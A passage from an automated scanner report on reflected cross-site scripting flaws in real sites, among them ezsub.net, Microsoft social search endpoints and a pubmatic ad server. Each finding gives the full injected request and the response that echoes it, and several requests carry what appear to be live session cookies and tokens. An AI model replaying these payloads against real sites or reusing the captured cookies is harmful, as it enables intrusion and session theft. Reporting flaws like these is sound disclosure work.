Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>New Su
...[SNIP]...
<input type="hidden" name="RDRID" value="87621"><SCRIPT>ALERT(1)</SCRIPT>5029AC893EF">
...[SNIP]...

5.35. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SBTYPE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the SBTYPE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ccef"><script>alert(1)</script>0d1de7150bc was submitted in the SBTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN7ccef"><script>alert(1)</script>0d1de7150bc&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>New Su
...[SNIP]...
<input type="hidden" name="SBTYPE" value="QN7CCEF"><SCRIPT>ALERT(1)</SCRIPT>0D1DE7150BC">
...[SNIP]...

5.36. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SOURCE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the SOURCE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2eca"><script>alert(1)</script>0294bf7bc9 was submitted in the SOURCE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INETd2eca"><script>alert(1)</script>0294bf7bc9&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>New Su
...[SNIP]...
<input type="hidden" name="SOURCE" value="INETD2ECA"><SCRIPT>ALERT(1)</SCRIPT>0294BF7BC9">
...[SNIP]...

5.37. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [jt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the jt request parameter is copied into the HTML document as plain text between tags. The payload 794cd<script>alert(1)</script>e16bfebfc40 was submitted in the jt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc794cd<script>alert(1)</script>e16bfebfc40&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Type: text/html

<html><body><h1>FOXISAPI call failed</h1><p><b>Progid is:</b> main.sv
<p><b>Method is:</b> run
<p><b>Parameters are:</b> jt=starr_wc794cd<script>alert(1)</script>e16bfebfc40&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
<p>
...[SNIP]...

5.38. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 147e7<script>alert(1)</script>0be166769ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k147e7<script>alert(1)</script>0be166769ba/uni0vle-e.css?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.001764
Content-Length: 68
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:35 GMT
Connection: close

Not Found: /k147e7<script>alert(1)</script>0be166769ba/uni0vle-e.css

5.39. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e468a<script>alert(1)</script>47bf0b2c2b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/uni0vle-e.csse468a<script>alert(1)</script>47bf0b2c2b0?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.001332
Content-Length: 68
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:35 GMT
Connection: close

Not Found: /k/uni0vle-e.csse468a<script>alert(1)</script>47bf0b2c2b0

5.40. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f4f35<img%20src%3da%20onerror%3dalert(1)>f86de5af1be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4f35<img src=a onerror=alert(1)>f86de5af1be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=ctl00_Masthead_Search_SearchTextBox&btnid=ctl00_Masthead_Search_SearchButton&brand=TechNet&loc=en-us&focusOnInit=true&Refinement=86&watermark=TechNet%20Magazine&f4f35<img%20src%3da%20onerror%3dalert(1)>f86de5af1be=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/ff426023.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092939992:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001?@E0I02h?@E0I

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: 93c60764a7ce82b2ad6321ad9ce04f9c
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB36
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Sat, 26 Mar 2011 13:41:44 GMT
Date: Sat, 26 Mar 2011 01:41:44 GMT
Content-Length: 12899
Connection: close


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
,"boxId":"ctl00_Masthead_Search_SearchTextBox","btnId":"ctl00_Masthead_Search_SearchButton","focusOnInit":true,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=86&f4f35<img src=a onerror=alert(1)>f86de5af1be=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

5.41. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i3.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 54008<img%20src%3da%20onerror%3dalert(1)>89def521705 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54008<img src=a onerror=alert(1)>89def521705 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&54008<img%20src%3da%20onerror%3dalert(1)>89def521705=1 HTTP/1.1
Host: i3.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; omniID=ue; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301090290290:ss=1301090290290; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF

Response

HTTP/1.1 200 OK
ntCoent-Length: 12845
Content-Type: application/x-javascript
ETag: 3a527f2cf9226449bb99733ecdd6b9ad
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB31
Content-Length: 12845
Cache-Control: public, max-age=43200
Expires: Sat, 26 Mar 2011 13:40:07 GMT
Date: Sat, 26 Mar 2011 01:40:07 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&54008<img src=a onerror=alert(1)>89def521705=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

5.42. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67fe9<img%20src%3da%20onerror%3dalert(1)>e5797209df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67fe9<img src=a onerror=alert(1)>e5797209df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=ctl00_Masthead_Search_SearchTextBox&btnid=ctl00_Masthead_Search_SearchButton&brand=TechNet&loc=en-us&focusOnInit=true&Refinement=86&watermark=TechNet%20Magazine&67fe9<img%20src%3da%20onerror%3dalert(1)>e5797209df=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg670984.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; omniID=ue; s_cc=true; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092937570:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001:@E0I02h:@E0I; s_sq=msstotn%2Cmsstotnonly%2Cmsstotnmktenus%2Cmsstotncentroll%2Cmsstotnctmag%3D%2526pid%253Dtechnet%25253A/en-us/magazine/gg703766%2526pidt%253D1%2526oid%253Dhttp%25253A//technet.microsoft.com/en-us/magazine/ff426023.aspx%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 12898
Content-Type: application/x-javascript
ETag: 4333d9fde5edd64c06ec0c3e90339f31
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Content-Length: 12898
Cache-Control: public, max-age=43200
Expires: Sat, 26 Mar 2011 13:41:39 GMT
Date: Sat, 26 Mar 2011 01:41:39 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
,"boxId":"ctl00_Masthead_Search_SearchTextBox","btnId":"ctl00_Masthead_Search_SearchButton","focusOnInit":true,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=86&67fe9<img src=a onerror=alert(1)>e5797209df=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

5.43. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4445b'-alert(1)-'90d16fca36c was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.11407896876335144&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html4445b'-alert(1)-'90d16fca36c HTTP/1.1
Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBCOOKIE_97=3385-uid:3c8eb88b-c9c1-47d0-9235-2d5e32a3350f; KADUSERCOOKIE=43A8ABFA-7497-471A-9AF6-2974D17EF335; KRTBCOOKIE_80=1336-002d9af2-d1e0-46f3-a4d5-a4e3b437adec.11265.18531.24197.6790.30337.8.6551.39832.10011.10012.4387.39857.7472.1073.51806.24680.39233.13893.13896.1097.13899.13902.38627.15694.15579.9691.51808.3427.18407.17256.24809.39536.39793.39794.11262.51069.1150.9855.; KRTBCOOKIE_22=488-pcv:1|uid:8392341830659049202; KRTBCOOKIE_58=1344-KH-00000000549735899; KRTBCOOKIE_32=1386-WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL; KRTBCOOKIE_148=1699-uid:439524AE836A5E4D157CECA302E891CB; KRTBCOOKIE_204=3579-06bdea66-433e-11e0-b98e-00259009a9e4; PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248.1039_1301416785.1340_1393698747.362_1301682747.1469_1393892161.70_1301922274.1928_1302874361.375_1302874358.1376_1302874361.445_1308400481.806_1331731734.1811_1395276815.1647_1302396826.540_1395425654.1985_1304870735

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:38 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 565

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
op:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=16&pubId=19677&ran=0.11407896876335144&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html4445b'-alert(1)-'90d16fca36c">
...[SNIP]...

5.44. http://image3.pubmatic.com/AdServer/UPug [ran parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the ran request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f79c'-alert(1)-'99a5d4b72c7 was submitted in the ran parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.114078968763351449f79c'-alert(1)-'99a5d4b72c7&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html HTTP/1.1
